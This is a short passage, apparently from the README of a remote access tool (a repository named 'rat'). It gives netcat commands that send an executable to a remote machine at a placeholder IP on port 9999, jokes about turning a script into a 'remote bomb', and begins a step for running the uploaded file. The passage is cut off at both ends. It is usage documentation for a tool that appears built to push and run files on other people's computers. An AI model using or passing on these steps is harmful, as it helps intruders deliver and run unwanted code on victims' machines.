tiny-bxnny/rat/README.md

   echo "upload your_file_name.exe" | nc {PC_IP_ADDRESS} 9999
   cat your_file_name.exe | nc {PC_IP_ADDRESS} 9999
   ```
----

-# BOMB/bomb.py
-(this is an example on how you can make a "remote bomb" out of this script lol)

 * **Execute the uploaded file:**
   ```